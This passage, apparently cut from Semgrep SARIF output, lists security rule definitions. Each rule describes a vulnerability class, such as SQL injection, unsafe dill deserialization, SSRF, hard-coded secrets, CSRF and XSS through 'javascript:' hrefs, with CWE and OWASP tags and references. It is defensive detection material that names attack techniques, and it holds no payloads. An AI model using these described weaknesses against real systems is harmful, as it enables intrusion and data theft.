java.lang.security.audit.sqli.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","id":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","name":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill","id":"python.lang.deserialization.tainted-dill.tainted-dill","name":"python.lang.deserialization.tainted-dill.tainted-dill","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-dill.tainted-dill"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","id":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","name":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","id":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","name":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mysql.express-mysql-sqli.express-mysql-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"help":{"markdown":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash)\n - [https://cwe.mitre.org/data/definitions/328.html](https://cwe.mitre.org/data/definitions/328.html)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","id":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","name":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express","id":"javascript.express.db.sequelize-express.sequelize-express","name":"javascript.express.db.sequelize-express.sequelize-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sequelize-express.sequelize-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","id":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","name":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"help":{"markdown":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf)\n - [https://www.cvedetails.com/cve/CVE-2020-28168/](https://www.cvedetails.com/cve/CVE-2020-28168/)\n - [https://owasp.org/www-community/attacks/Server_Side_Request_Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery)\n","text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"helpUri":"https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","id":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","name":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"help":{"markdown":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash)\n - [https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile](https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile)\n","text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"helpUri":"https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","id":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","name":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","id":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","name":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","id":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","name":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"help":{"markdown":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted)\n - [https://laravel.com/docs/9.x/responses#cookies-and-encryption](https://laravel.com/docs/9.x/responses#cookies-and-encryption)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management)\n","text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","id":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","name":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","id":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","name":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"help":{"markdown":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment)\n - [https://cwe.mitre.org/data/definitions/915.html](https://cwe.mitre.org/data/definitions/915.html)\n - [https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md](https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md)\n","text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment","id":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","name":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","MEDIUM CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.audit.mass-assignment.mass-assignment"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","id":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","name":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","id":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","name":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"help":{"markdown":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href)\n - [https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI](https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI)\n - [https://github.com/pugjs/pug/issues/2952](https://github.com/pugjs/pug/issues/2952)\n","text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start 